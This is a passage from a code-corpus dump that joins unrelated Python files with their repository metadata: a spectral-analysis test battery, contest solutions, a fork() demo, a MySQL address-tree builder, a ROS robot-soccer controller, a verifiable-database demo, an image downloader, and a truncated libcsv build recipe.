            if 'plot_dir' in kwargs: plt.close('all')
def itpc_test_battery(methods=('wavelet','multitaper','bandfilter'),
                      tests=('frequency','amplitude','phase','phase_sd','n'),
                      itpc_methods=('PLV','Z','PPC'), do_tests=True, **kwargs):
    """
    Run a battery of given tests on given intertrial phase clustering computation methods

    Parameters
    ----------
    methods : array-like, default: ('wavelet','multitaper','bandfilter') (all supported methods)
        List of power computation methods to test.

    tests : array-like, default: ('frequency','amplitude','phase','phase_sd','n') (all supported)
        List of tests to run.

    itpc_methods : array-like, default: ('PLV','Z','PPC') (all supported options)
        List of methods to use for computing intertrial phase clustering

    do_tests : bool, default: True
        Set=True to evaluate test results against expected values and raise an error if they fail.

    **kwargs :
        Any other keyword args passed directly to test_power()
    """
    if isinstance(methods,str): methods = [methods]
    if isinstance(tests,str): tests = [tests]

    # Default phase SD = 45 deg (pi/4 rad) unless set otherwise
    # (the old comment claimed 90 deg, but pi/4 is 45 deg)
    phi_sd = kwargs.pop('phi_sd',pi/4)

    for test in tests:
        for itpc_method in itpc_methods:
            for method in methods:
                print("Running %s test on %s %s" % (test,method,itpc_method))
                # Copy kwargs so per-iteration changes can never leak across runs
                extra_args = dict(kwargs)

                t1 = time.time()
                _,_,passed = test_power(method, test=test, itpc_method=itpc_method,
                                        spec_type='itpc', phi_sd=phi_sd, do_tests=do_tests,
                                        **extra_args)
                print('%s (test ran in %.1f s)'
                      % ('PASSED' if passed else 'FAILED', time.time()-t1))

                # If saving plots to file, let's not leave them all open
                if 'plot_dir' in kwargs: plt.close('all')
| sbrincat/spynal | spynal/tests/validity_test_spectra.py | validity_test_spectra.py | py | 22,439 | python | en | code | 8 | github-code | 90 |
from itertools import accumulate

# Sweep DP over items on a circle of circumference C -- reads
# "N C  x1 v1 ... xN vN" from stdin (positions x ascending, value v each).
# NOTE(review): looks like the "eat items walking either direction, possibly
# turning around once" problem (e.g. AtCoder Static Sushi) -- confirm.
N, C, *xv = map(int, open(0).read().split())
xv = [(x, v) for x, v in zip(*[iter(xv)] * 2)]  # pair the flat list into (pos, value)
# cw_acc[i]  : net gain after taking the first i items walking clockwise
# ccw_acc[i] : net gain after taking the last i items walking counter-clockwise
cw_acc = [0] * (N + 1)
ccw_acc = [0] * (N + 1)
cw_prev = 0    # previous clockwise position (start at 0)
ccw_prev = C   # previous counter-clockwise position (start at C, i.e. 0 going backwards)
for i in range(N):
    k = N - i - 1
    # gain = value of the item minus the walking distance from the previous stop
    cw_acc[i + 1] = cw_acc[i] + xv[i][1] - (xv[i][0] - cw_prev)
    cw_prev = xv[i][0]
    ccw_acc[i + 1] = ccw_acc[i] + xv[k][1] - (ccw_prev - xv[k][0])
    ccw_prev = xv[k][0]
# Prefix maxima: best net gain using at most i items in each direction
cw_acc = list(accumulate(cw_acc, max))
ccw_acc = list(accumulate(ccw_acc, max))
ans = 0
for i in range(N):
    k = N - i - 1
    # Four cases: one direction only, or go one way then walk back past the
    # start and continue the other way (paying the return distance again)
    ans = max(
        ans,
        cw_acc[i + 1],
        cw_acc[i + 1] - xv[i][0] + ccw_acc[k],
        ccw_acc[i + 1],
        ccw_acc[i + 1] - (C - xv[k][0]) + cw_acc[k],
    )
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03372/s580983874.py | s580983874.py | py | 733 | python | en | code | 0 | github-code | 90 |
# Modifying a global variable from multiple processes
"""
After fork(), each process owns its own copy of all data (including global
variables), so a change made in one process does not affect the other.
To actually share data between processes, use an IPC mechanism such as
named/unnamed pipes, shared memory, message queues, or the network.
"""
import os
import time
g_num=100
# os.fork() returns 0 in the child process, and the child's pid in the parent
ret=os.fork()
if ret==0:
    # Child process: increments only its own copy of g_num (-> 101)
    print("-------process-1-------")
    g_num+=1
    print("-------process-1 g_num=%d---"%g_num)
else:
    # Parent process: sleep so the child runs first, then print the parent's
    # unchanged copy of g_num (still 100)
    time.sleep(3)
    print("-------process-2-------")
    print("-------process-2 g_num=%d---"%g_num)
| DorisBian/projectGit | pythonPractice/SystemProgramming-Process/ModifyGlobalVariable.py | ModifyGlobalVariable.py | py | 527 | python | zh | code | 0 | github-code | 90 |
def solve():
    """Read N (odd) and N head-probabilities from stdin; return the
    probability that the coins show strictly more heads than tails."""
    N = int(input())
    P = list(map(float, input().split()))
    # table[c][h]: probability of exactly h heads among the first c coins
    table = [[0] * (N + 1) for _ in range(N + 1)]
    table[0][0] = 1
    for c in range(1, N + 1):
        p = P[c - 1]
        for h in range(c + 1):
            # When h == 0, table[c-1][h-1] is table[c-1][-1], which is 0 here
            table[c][h] = table[c - 1][h - 1] * p + table[c - 1][h] * (1 - p)
    # Majority-heads outcomes are h = N//2 + 1 .. N
    return sum(table[-1][N // 2 + 1:])
print(solve()) | Aasthaengg/IBMdataset | Python_codes/p03168/s798372895.py | s798372895.py | py | 291 | python | en | code | 0 | github-code | 90 |
19981795802 | import urllib.request as urr
import json
import urllib.parse as urp
import time
data={}
def getmovies(data):
    """Fill `data` with one hard-coded movie record and POST it to douban's
    movie-search endpoint.

    NOTE(review): the endpoint looks like a read-only search API; POSTing the
    movie fields to it is probably not the intent -- verify. The decoded JSON
    response (`target`) is parsed but never used or returned.
    """
    print("dssd")  # leftover debug print
    data['cover']="https://img3.doubanio.com/view/photo/s_ratio_poster/public/p2518852413.jpg"
    data['cover_x']='960'
    data['cover_y']='1500'
    data['id']="26997663"
    data['is_new']=False
    data['playable']=True
    data['rate']="6.3"
    data['title']="寂静之地"
    data['url']="https://movie.douban.com/subject/26997663/"
    print(data)
    # tag=%E6%81%90%E6%80%96 is the URL-encoded genre tag "恐怖" (horror)
    url = 'https://movie.douban.com/j/search_subjects?type=movie&tag=%E6%81%90%E6%80%96&sort=recommend&page_limit=20&page_start=0'
    # Form-encoding a body makes urlopen issue a POST instead of a GET
    data = urp.urlencode(data).encode('utf-8')
    response = urr.urlopen(url,data)
    html = response.read().decode('utf-8')
    target = json.loads(html)  # parsed but unused
# Script entry point: perform the single hard-coded request once
if __name__ == '__main__':
    getmovies(data)
| yaunsine/Python3 | catch_translate.py | catch_translate.py | py | 860 | python | en | code | 1 | github-code | 90 |
# Solved 2022-04-13.
# An earlier attempt failed once |s| <= 100000 -- looked like a time-limit issue.
# Considered reimplementing in C++, but found another way:
# --> record, per letter of t, its (first) index in a dict, then scan s and
#     look up each letter's index within t.
#     Whenever an index is <= the previous letter's index, one more pass of t
#     is needed, so n += 1.
# With O(1) dict lookups the total time complexity is O(n).
s = input()
t = input()
success = 1
n = 1
alphabets_index_t = dict()
if set(s) - set(t): # impossible if s contains a letter that does not occur in t
    success = 0
if success:
    # Map each letter of t to the index of its first occurrence
    for i, word in enumerate(t):
        if word not in alphabets_index_t:
            alphabets_index_t[word] = i
    index_s = 1
    while index_s < len(s):
        if alphabets_index_t[s[index_s-1]] >= alphabets_index_t[s[index_s]]: # previous letter sits at or after the current one in t -> one more pass needed
            n += 1
        index_s += 1
    print(n)
else:
    print(-1) | siejwkaodj/Problem-Solve | Baekjoon/KOI_highschool/20191_줄임말.py | 20191_줄임말.py | py | 1,049 | python | ko | code | 1 | github-code | 90
19276867926 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
@project: AddressTreeBuilder
@author: Jian Sheng
@file: BuildTreeByID.py
@ide: PyCharm
@TIME: 2019-01-10 11:18:19
"""
from __future__ import unicode_literals # at top of module
from __future__ import division, print_function, with_statement
import uuid
import pymysql
import datetime
import traceback
from binarySearching import binary_Searching
class TreeNode(object):
    """Node of an address-element tree.

    Each node carries its display `name`, a reference to its `parent`,
    database ids (`id`, `parentID`), an address-element `type` code, and a
    dict of children keyed by child name.
    """
    def __init__(self, name, parent=None):
        super(TreeNode, self).__init__()
        self.name = name
        self.parent = parent
        self.id = ''
        self.parentID = ''
        self.type = ''
        self.child = {}         # name -> TreeNode

    def __repr__(self):
        return 'TreeNode(%s)' % self.name

    def __contains__(self, item):
        return item in self.child

    def __len__(self):
        """Return number of children of this node."""
        return len(self.child)

    def __bool__(self):
        # BUGFIX: __bool__ must take only `self`; the old signature
        # (self, item) made bool(node) raise TypeError.
        """An existing node is always truthy."""
        return True

    @property
    def path(self):
        """Return the space-joined path string from the root to this node."""
        if self.parent:
            return '%s %s' % (self.parent.path.strip(), self.name)
        else:
            return self.name

    def get_child(self, name, defval=None):
        """Return the child node called `name`, or `defval` if absent."""
        return self.child.get(name, defval)

    def add_child(self, name, id, obj=None):
        """Attach (or re-parent) a child node named `name` with database id
        `id` under this node; return the child."""
        if obj and not isinstance(obj, TreeNode):
            raise ValueError('TreeNode only add another TreeNode obj as child')
        if obj is None:
            obj = TreeNode(name)
        obj.parent = self
        obj.parentID = self.id
        obj.id = id
        self.child[name] = obj
        return obj

    def del_child(self, name):
        """Remove the child named `name` from this node (no-op if absent)."""
        if name in self:
            del self.child[name]

    def create_child(self, path, create=False, cursor=None, sql='', zuobiao=''):
        """Walk `path` (list or whitespace-separated string) below this node.

        With create=True, missing nodes are created, classified via
        searchType(), and INSERTed through `cursor` using the `sql` template
        (placeholders: id, parent id, name, type, coordinates).
        Returns the last node reached, or None if the walk stopped early.
        """
        # Convert path to a list if input is a string
        path = path if isinstance(path, list) else path.split()
        cur = self
        index = 0
        # BUGFIX: the old `while ...: path.remove(''); path.remove(' ')` loop
        # raised ValueError when only one of the two blank variants was present
        path = [sub for sub in path if sub not in ('', ' ')]
        for sub in path:
            # Look up the child ('镇江市' always maps back to this root node)
            if sub == '镇江市':
                obj = self
            else:
                obj = cur.get_child(sub)
            # Create (and persist) the child if requested and not found
            if obj is None and create:
                obj = cur.add_child(name=sub, id=uuid.uuid1())
                type = searchType(index=index, nodeName=sub)
                # Only this element type gets the coordinate string stored
                if type == '19d219f15efe4408892c2f955e439489':
                    ins = sql % (obj.id, obj.parentID, sub, type, zuobiao)
                else:
                    ins = sql % (obj.id, obj.parentID, sub, type, '')
                obj.type = type
                cursor.execute(ins)
            # Stop if the lookup failed and creation was not requested
            if obj is None:
                break
            cur = obj
            index += 1
        return obj

    def build_tree_by_id(self, resultList):
        """Attach rows (id, parent_id, name) from `resultList` below this node,
        consuming each matched row; `resultList` must be sorted by parent id.
        Returns the leftover (unmatched) rows.

        NOTE(review): assumes binary_Searching() returns a valid index even
        for an empty list -- confirm against its implementation.
        """
        root = self
        if root is not None:
            while True:
                index = binary_Searching(alist=resultList, data=root.id)
                if resultList[index][1] == root.id:
                    cur = root.add_child(name=resultList[index][2], id=resultList[index][0])
                    resultList.pop(index)
                    cur.build_tree_by_id(resultList)
                else:
                    break
        return resultList

    def numberOfLeafs(self):
        """Return the number of leaf nodes in the subtree rooted at this node."""
        if not self.child:
            return 1
        return sum(node.numberOfLeafs() for node in self.child.values())

    def items(self):
        """Expose the (name, child) pairs of this node."""
        return self.child.items()

    def dump_tree_on_txt(self, fw, indent=0):
        """Pretty-print the subtree to stdout and write it to open file `fw`."""
        tab = ' '*(indent-1) + ' |- ' if indent > 0 else ''
        print('%s%s' % (tab, self.name))
        fw.write('%s%s' % (tab, self.name) + '\n')
        # BUGFIX: recurse via dump_tree_on_txt -- the old code called the
        # non-existent obj.dump(), raising AttributeError on any child
        for name, obj in self.items():
            obj.dump_tree_on_txt(fw=fw, indent=indent+1)

    def dump_tree_on_console(self, indent=0):
        """Pretty-print the subtree to the console."""
        tab = ' '*(indent-1) + ' |- ' if indent > 0 else ''
        print('%s%s' % (tab, self.name))
        for name, obj in self.items():
            obj.dump_tree_on_console(indent+1)

    def build_path(self, fw, parentTree=''):
        """Write one concatenated full-address line per leaf to open file `fw`
        (used for manual verification of the tree)."""
        treeNodeName = '%s' % (self.name)
        if self.name != '陕西省':
            _tree = parentTree + treeNodeName
        else:
            _tree = '陕西省'
        if self.child == {}:
            _tree += '\n'
            fw.write(_tree)
        for name, obj in self.items():
            obj.build_path(fw=fw, parentTree=_tree)
def querySQL(sql = ''):
    """Execute `sql` against the local MySQL `test` schema and return all rows.

    Returns an empty tuple when the query fails (the old version raised
    NameError on `resultSet` in that case).
    NOTE(review): host/user/password are hard-coded -- move to configuration.
    """
    resultSet = ()  # BUGFIX: defined even when execute/fetch fails
    db = pymysql.connect("localhost", "root", "123456", "test")
    cursor = db.cursor()
    try:
        cursor.execute(sql)
        resultSet = cursor.fetchall()
        db.commit()
    except Exception as e:
        # Roll back in case there is any error
        print(e)
        db.rollback()
    finally:
        # BUGFIX: always release the cursor and connection, even on error
        cursor.close()
        db.close()
    return resultSet
def searchType1(index, length, nodeName, parentType):
    """Classify an address-element name into a legacy numeric type code.

    `index` is the element's position within the full path, `length` the
    path length, and `parentType` the (string) code of the parent element.
    Checks are ordered, so the first matching rule wins.
    """
    if nodeName == '陕西省':
        return '0'
    if nodeName == '铜川市':
        return '14'
    if nodeName in ('王益区', '耀州区', '宜君县', '印台区', '新区'):
        return '15'
    if any(keyword in nodeName for keyword in ('镇', '乡', '街道')):
        return '20'
    if '路' in nodeName or '巷' in nodeName or ('街' in nodeName and '道' not in nodeName):
        return '41'
    if '村' in nodeName:
        return '43'
    if '组' in nodeName:
        return '34'
    if '号' in nodeName and int(parentType) < 50:
        return '100'
    if '栋' in nodeName or '幢' in nodeName or ('楼' in nodeName and index < length - 1 and int(parentType) > 50):
        return '102'
    if '单元' in nodeName:
        return '51'
    if ('号' in nodeName or '层' in nodeName or '楼' in nodeName) and index == length - 1:
        return '53'
    # Default: treat anything unrecognized as a road-level element
    return '41'
def searchType(index, nodeName):
    """Map (path depth `index`, element name) to an address-element-type UUID.

    Returns None for any combination not covered below (callers rely on
    that fall-through behavior).
    """
    if index == 1:
        if '区' in nodeName:
            return '19d201f15efe4408892c2f955e439489'
        if '县' in nodeName:
            return '19d202f15efe4408892c2f955e439489'
    elif index == 2:
        # Keyword order matters: '街道' must be tested before '镇'/'乡'
        for keyword, type_id in (('街道', '19d206f15efe4408892c2f955e439489'),
                                 ('镇', '19d205f15efe4408892c2f955e439489'),
                                 ('乡', '19d204f15efe4408892c2f955e439489')):
            if keyword in nodeName:
                return type_id
    elif index == 3:
        return '19d213f15efe4408892c2f955e439489'
    elif index == 4:
        return '19d219f15efe4408892c2f955e439489'
    elif index == 5:
        return '19d221f15efe4408892c2f955e439489'
    # Implicitly returns None otherwise
"""制定排序规则"""
def orderByIndex(elem):
    """Sort key for DB rows: the parent-element id stored in column 1."""
    _, parent_id, *_rest = elem
    return parent_id
if __name__ == '__main__':
    startTime = datetime.datetime.now()
    print('-----------------Start build tree from dzys-------------------------------')
    # Load every address element (id, parent id, name); build_tree_by_id()
    # binary-searches on the parent-id column, so rows are sorted by it
    selectSQL = 'select id,shangjiyuansu,dizhiyuansumingcheng from sd_dz_dizhiyuansu order by shangjiyuansu asc'
    # NOTE(review): host/credentials are hard-coded -- move to configuration
    db = pymysql.connect(host="localhost", port=3307, user="root", passwd="123456", db="sd_dmdzk_zjmz", charset='utf8')
    cursor = db.cursor()
    cursor.execute(selectSQL)
    resultSet = cursor.fetchall()
    resultList = list(resultSet)
    resultList.sort(key=orderByIndex)  # sort by parent-element id
    # Root node: the fixed database id of the city 镇江市
    root = TreeNode(name='镇江市')
    root.id = '73B091DD20C149D780326C5695519897'
    print('正在加载...')
    root.build_tree_by_id(resultList)
    print('----------------End build tree!-------------------------------------------\r\n')
    f = open("镇江纸质地址树.txt", "a", encoding="utf-8")
    print('----------------Start build path!------------------------------------------')
    print('正在创建...')
    root.build_path(fw=f)
    print('----------------End build path!-------------------------------------------')
    f.flush()
    f.close()
    endTime = datetime.datetime.now()
    print(endTime - startTime)
    print(resultList)  # leftover rows whose parent id was never matched
# starttime = datetime.datetime.now()
# print('hello')
# selectSQL = 'select * from ruku order by lat DESC'
# insertSQL = """insert into sd_dz_dizhiyuansu_0225(id,shangjiyuansu,dizhiyuansumingcheng,dizhiyuansuleixing,zuobiao,zhuangtai) values('%s','%s','%s','%s','%s',2)"""
# sel = 'select id,shangjiyuansu,dizhiyuansumingcheng from sd_dz_dizhiyuansu_0225 order by shangjiyuansu '
#
# db = pymysql.connect(host="localhost", port=3307, user="root", passwd="123456", db="sd_dmdzk_zjmz", charset='utf8')
# cursor = db.cursor()
# cursor.execute(sel)
# result = cursor.fetchall()
# resList = list(result)
# root = TreeNode(name='镇江市')
# root.id = '73B091DD20C149D780326C5695519897'
# root.build_tree_by_id(resList)
# #root.dump_tree_on_console()
#
# cursor.execute(selectSQL)
# resultSet = cursor.fetchall()
#
#
# count = 0
# for addre in resultSet:
# try:
# addrList = list(addre)
# latlng = '{"lat":' + addrList[0] + ',"lng":' + addrList[1] + '}' if addrList[0] != '' else ''
# addr = addrList[2:]
# obj = root.create_child(path=addr, create=True, cursor=cursor, sql=insertSQL, zuobiao=latlng)
# except Exception as e:
# # Rollback in case there is any error
# print(e)
# db.rollback()
# f = open("log.txt", 'a')
# traceback.print_exc(file=f)
# f.flush()
# f.close()
# count += 1
# log = '第' + str(count) + '条打完了'
# print(log)
# db.commit()
# cursor.close()
# db.close()
# endtime = datetime.datetime.now()
# print(endtime - starttime)
| Jack-Sheng/AddressTreeBuilder | BuildTreeByID.py | BuildTreeByID.py | py | 10,795 | python | en | code | 0 | github-code | 90 |
71573576298 | #! /usr/bin/env python3
import rospy # Importamos el módulo rospy para interactuar con ROS
from geometry_msgs.msg import Twist # Importamos el mensaje Twist para el control de movimiento
from grsim_ros_bridge_msgs.msg import SSL # Importamos el mensaje SSL para la comunicación con grSim
from krssg_ssl_msgs.msg import SSL_DetectionFrame, SSL_DetectionBall # Importamos los mensajes relacionados con la detección de robots y balón
import math # Importamos el módulo math para realizar operaciones matemáticas
from jugador import Jugador
ball = SSL_DetectionBall() # Creamos una instancia del mensaje SSL_DetectionBall
golero = Jugador('golero')
defensaIzquierda= Jugador('defensaIzquierda')
defensaDerecho = Jugador('defensaDerecho')
atacante1 = Jugador('atacante1')
atacante2 = Jugador('atacante2')
def vision_callback(data):
    """Cache the latest vision frame: ball detections and blue-robot poses."""
    global ball
    ball = data.balls  # keep the raw list of ball detections
    # Route each detected blue robot to the player object with the same id.
    players_by_id = {
        0: golero,
        1: defensaIzquierda,
        2: defensaDerecho,
        3: atacante1,
        4: atacante2,
    }
    for robot in data.robots_blue:
        player = players_by_id.get(robot.robot_id)
        if player is not None:
            player.set_ubicacion(robot.pixel_x, robot.pixel_y)
            player.set_orientacion(robot.orientation)
# Squared-distance thresholds in vision coordinates: beyond FAR_SQ a player
# returns to its assigned position, below POSSESS_SQ it can play the ball.
FAR_SQ = 250000
POSSESS_SQ = 12100
# A player whose squared distance to its home spot is below this just faces
# forward instead of moving (original `dis_cerca`).
HOME_SQ = 10000


def _hold_position(player, msg):
    """Send *player* back to its home spot, or face forward if already there."""
    distance_pos = player.set_posicion_distan()
    if distance_pos < HOME_SQ:
        return player.mirar_frente(msg)
    msg, orient = player.ir_a_posicion(distance_pos, msg)
    # Keep the cached orientation in sync with the movement command.  The
    # original code skipped this update for defensaDerecho only, which looked
    # like an oversight; it is now done consistently for every player.
    player.set_orientacion(orient)
    return msg


def _pass_to_closest(player, px, py, team, msg):
    """Hold the ball and turn towards the closest team mate for a pass."""
    msg = player.agarra_pelota(msg)
    mate = player.jugador_cerca(team, player.posicion)
    goal_angle = math.atan2(mate.get_ubicacion()['y'] - py,
                            mate.get_ubicacion()['x'] - px)
    heading = goal_angle - player.get_orientacion()
    heading = math.atan2(math.sin(heading), math.cos(heading))
    return player.pase_a_jugador(heading, msg)


def _keeper_step(player, team, px, py, bx, by, msg):
    """Goal keeper: stay home unless the ball is close or threatens the goal."""
    dist_sq = (bx - px) ** 2 + (by - py) ** 2
    # bx > -800 means the ball is still away from our goal line.
    if bx > -800 and dist_sq > FAR_SQ:
        return _hold_position(player, msg)
    if dist_sq < POSSESS_SQ:
        return _pass_to_closest(player, px, py, team, msg)
    return player.ir_a_pelota(bx, by, dist_sq, msg)


def _defender_step(player, team, px, py, bx, by, msg):
    """Defender: hold position when the ball is far, else chase it and pass."""
    dist_sq = (bx - px) ** 2 + (by - py) ** 2
    if dist_sq > FAR_SQ:
        return _hold_position(player, msg)
    if dist_sq < POSSESS_SQ:
        return _pass_to_closest(player, px, py, team, msg)
    return player.ir_a_pelota(bx, by, dist_sq, msg)


def _attacker_step(player, px, py, bx, by, msg):
    """Attacker: hold position when the ball is far, else chase it and shoot."""
    dist_sq = (bx - px) ** 2 + (by - py) ** 2
    if dist_sq > FAR_SQ:
        return _hold_position(player, msg)
    if dist_sq < POSSESS_SQ:
        msg = player.agarra_pelota(msg)
        return player.pateo_al_arco(msg)
    return player.ir_a_pelota(bx, by, dist_sq, msg)


if __name__ == "__main__":
    rospy.init_node("grsim_pria", anonymous=False)
    rospy.Subscriber("/vision", SSL_DetectionFrame, vision_callback)

    players = [golero, defensaIzquierda, defensaDerecho, atacante1, atacante2]
    # One command publisher per robot; the topic index matches the robot id.
    for robot_id, player in enumerate(players):
        player.publisher = rospy.Publisher("/robot_blue_%d/cmd" % robot_id,
                                           SSL, queue_size=10)

    r = rospy.Rate(1000)  # publish commands at 1000 Hz
    messages = [SSL() for _ in players]
    positions = [(0, 0) for _ in players]  # last known (x, y) per player
    ball_x = 0
    ball_y = 0

    while not rospy.is_shutdown():
        try:
            ball_x = ball[0].x
            ball_y = ball[0].y
            positions = [(p.get_ubicacion()['x'], p.get_ubicacion()['y'])
                         for p in players]
        except Exception:
            pass  # no vision data yet: keep the last known values

        # Reset the one-shot actions before computing this cycle's commands.
        for msg in messages:
            msg.kicker = 0
            msg.dribbler = False

        gx, gy = positions[0]
        messages[0] = _keeper_step(golero, players, gx, gy,
                                   ball_x, ball_y, messages[0])
        for i in (1, 2):  # defenders
            dx, dy = positions[i]
            messages[i] = _defender_step(players[i], players, dx, dy,
                                         ball_x, ball_y, messages[i])
        for i in (3, 4):  # attackers
            ax, ay = positions[i]
            messages[i] = _attacker_step(players[i], ax, ay,
                                         ball_x, ball_y, messages[i])

        for player, msg in zip(players, messages):
            player.publisher.publish(msg)
r.sleep() | janddres/proy-grsim-robocup | grsim_pria.py | grsim_pria.py | py | 13,112 | python | es | code | 0 | github-code | 90 |
16364063378 | from __future__ import print_function
import json, sys, cmd
import cPickle as pickle
from verifiable_base import VerifiableBase
from verifiable_log import VerifiableLog
from verifiable_map import VerifiableMap, recalc_tree_hash
# Example general purpose verifiable database
# Mutation opertions append to its log
# Its verifiable map then calls the callback (_apply_operation) to change the view.
class VerifiableDatabase(VerifiableBase):
    """Verifiable key/value database.

    Mutations are appended to a verifiable log; the verifiable map then
    invokes _apply_operation to replay each sequenced entry onto the view.
    """
    def __init__(self):
        VerifiableBase.__init__(self, VerifiableLog())

    def _apply_operation(self, idx, operation, map):
        # Callback from the underlying map when the log sequences an entry.
        op = json.loads(operation)
        action = op['operation']
        key = str(op['key'])
        if action == 'set':
            map.put(key, str(op['value']))
        elif action == 'delete':
            map.put(key, '')  # an empty value marks a deleted key

    def set(self, key, value):
        # Record a "set key to value" mutation in the log.
        entry = json.dumps({'operation': 'set', 'key': key, 'value': value})
        self._log.append(entry)

    def delete(self, key):
        # Record a "delete key" mutation in the log.
        self._log.append(json.dumps({'operation': 'delete', 'key': key}))

    def get(self, key, tree_size):
        # Return (value, proof) for a key at the given tree size (as
        # returned by get_tree_head); value is None when the key is absent.
        raw, proof = VerifiableBase.get(self, str(key), tree_size)
        return (str(raw) if len(raw) else None), proof
def test(db, query, tree_size, exp_val):
    """Assert the value for *query* at *tree_size* and check its inclusion proof."""
    val, proof = db.get(query, tree_size)
    assert val == exp_val
    expected_root = db.get_tree_head(tree_size)['sha256_root_hash']
    assert recalc_tree_hash(query, str(val) if val else '', proof) == expected_root
class ReplCmd(cmd.Cmd):
    """Interactive shell for poking at a VerifiableDatabase."""

    def __init__(self):
        cmd.Cmd.__init__(self)
        self.prompt = '> '
        self.do_new()

    def do_sth(self, arg):
        try:
            if not len(arg.strip()):
                seq = None
            else:
                seq = int(arg)
        except ValueError:  # was a bare except; only int() can fail here
            self.help_sth()
            return
        print(self.db.get_tree_head(seq))

    def help_sth(self):
        print('sth <integer> - Updates tree to sequence number and print STH. Leave blank for latest.')

    def do_new(self, arg=''):
        self.db = VerifiableDatabase()

    def help_new(self):
        print('new - creates a new database, called by default upon launch')

    def do_save(self, arg):
        arg = arg.strip()
        if not len(arg):
            self.help_save()
            return
        # open() + with replaces the Python 2-only file() builtin and makes
        # sure the handle is flushed and closed.
        with open(arg, 'wb') as f:
            pickle.dump(self.db, f)

    def help_save(self):
        print('save <path> - save state to a path')

    def do_load(self, arg):
        arg = arg.strip()
        if not len(arg):
            self.help_load()
            return
        with open(arg, 'rb') as f:
            self.db = pickle.load(f)

    def help_load(self):
        print('load <path> - load state from path')

    def do_set(self, arg):
        try:
            n, v = arg.split(' ')
        except ValueError:  # wrong number of words
            self.help_set()
            return
        n = n.strip()
        v = v.strip()
        self.db.set(n, v)
        self.do_get(n)

    def help_set(self):
        print('set <key> <value> - set key (string) to the specified value (string)')

    def do_get(self, arg):
        try:
            n, v = arg.split(' ')
            n = n.strip()
            v = v.strip()
        except ValueError:  # no explicit tree size given: use the latest
            n = arg.strip()
            v = self.db.get_tree_head(None)['tree_size']
        try:
            v = int(v)
        except ValueError:
            self.help_get()
            return
        try:
            val, proof = self.db.get(n, v)
        except ValueError:
            print('Tree size does not exist.')
            return
        print('Value: ', val)
        print('Proof: ', proof)
        print('Map hash: ', self.db.get_tree_head(v)['sha256_root_hash'])
        print('Log hash: ', self.db.get_tree_head(v)['log_tree_head']['sha256_root_hash'])
        print('Tree size: ', self.db.get_tree_head(v)['tree_size'])

    def help_get(self):
        print('get <key> <integer> - get value as of this sequence number. Leave blank for latest.')

    def do_del(self, arg):
        n = arg.strip()
        self.db.delete(n)
        self.do_get(n)

    def help_del(self):
        print('del <key> - delete key (string) from database')

    def do_dump(self, arg=''):
        try:
            if not len(arg.strip()):
                seq = None
            else:
                seq = int(arg)
        except ValueError:
            self.help_dump()
            return
        print('Tree:')
        self.db.debug_dump(seq)

    def help_dump(self):
        print('dump <integer> - dump the tree as of this sequence number. Leave blank for latest.')

    def do_log(self, arg=''):
        for i, x in enumerate(self.db.get_log_entries(0, self.db.get_tree_head()['tree_size'] - 1)):
            print(i, x)

    def help_log(self):
        print('log - dump all ops')
# Smoke test: build a small history for key 'foo' and check every historical
# value together with its inclusion proof.
db = VerifiableDatabase()
db.set('foo', 'bar')
db.set('foo', 'baz')
db.delete('foo')
db.set('foo', 'bar')
db.get_tree_head()
# Tree size 0 predates any operation; each later size sees one more mutation.
test(db, 'foo', 0, None)
test(db, 'foo', 1, 'bar')
test(db, 'foo', 2, 'baz')
test(db, 'foo', 3, None)
test(db, 'foo', 4, 'bar')
if __name__ == '__main__':
    ReplCmd().cmdloop('Type "help" to get started.')
| google/certificate-transparency | python/demo/vdb/demo_general_database.py | demo_general_database.py | py | 4,825 | python | en | code | 862 | github-code | 90 |
36665105867 |
def solve(low, high):
    """Return a pair (l, r) with low <= l < r <= high and LCM(l, r) in range.

    (low, 2*low) always works when it fits, since lcm(l, 2l) = 2l; otherwise
    no valid pair exists and (-1, -1) is returned.
    """
    if low * 2 > high:
        return (-1, -1)
    return (low, low * 2)


def main():
    """Read the number of cases, then one 'low high' pair per line."""
    cases = int(input(''))
    for _ in range(cases):
        low, high = map(int, input('').split())
        print(*solve(low, high))


# The original ran at import time; the guard makes the logic importable
# (and testable) without consuming stdin.
if __name__ == '__main__':
    main()
| ringedSquid/Stuy_CCC_Potd | Codeforces/1389A.py | 1389A.py | py | 213 | python | en | code | 0 | github-code | 90 |
40395856255 | # -*- coding:UTF-8 -*-
import urllib.request
import urllib.parse

IMAGE_URL = 'https://ss0.bdstatic.com/70cFvHSh_Q1YnxGkpoWK1HF6hhy/it/u=2699817650,1238409640&fm=27&gp=0.jpg'
# Scraping needs a browser-like User-Agent header, added by hand here.
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2'
}


def download_image(url, filename):
    """Download *url* and write the raw bytes to *filename*."""
    request = urllib.request.Request(url=url, headers=HEADERS)
    # Context managers close both the HTTP response (leaked by the original
    # code) and the output file.
    with urllib.request.urlopen(request) as response, \
            open(filename, 'wb') as f:
        f.write(response.read())


if __name__ == '__main__':
    download_image(IMAGE_URL, 'naza.jpg')
| yuansuixin/learn-python-pacong4 | c_image.py | c_image.py | py | 530 | python | en | code | 0 | github-code | 90 |
18161209339 | N = int(input())
MOD = 10 ** 9 + 7


def pairwise_product_sum(values):
    """Return sum of values[i] * values[j] over all i < j, modulo 1e9+7."""
    remaining = sum(values) % MOD
    answer = 0
    for v in values:
        # Pair v with the (mod-reduced) sum of every element after it.
        remaining = (remaining - v) % MOD
        answer = (answer + v * remaining) % MOD
    return answer


def main():
    """Read N and the N values, then print the answer."""
    n = int(input())
    values = list(map(int, input().split()))[:n]
    print(pairwise_product_sum(values))


# The original ran at import time; the guard makes the logic importable
# (and testable) without consuming stdin.
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p02572/s119485925.py | s119485925.py | py | 215 | python | en | code | 0 | github-code | 90 |
36136243789 | import info
class subinfo(info.infoclass):
    # Craft blueprint metadata for libcsv: download target and checksum.
    def setTargets(self):
        # Single upstream release, fetched from SourceForge.
        ver = "3.0.3"
        self.targets[ver] = f"https://downloads.sourceforge.net/project/libcsv/libcsv/libcsv-{ver}/libcsv-{ver}.tar.gz"
        self.targetInstSrc[ver] = 'libcsv-'+ver
        # SHA-1 digest of the source tarball.
        self.targetDigests[ver] = ("2f637343c3dfac80559595f519e8f78f25acc7c1")
        self.defaultTarget = ver
from Package.AutoToolsPackageBase import *
class Package(AutoToolsPackageBase):
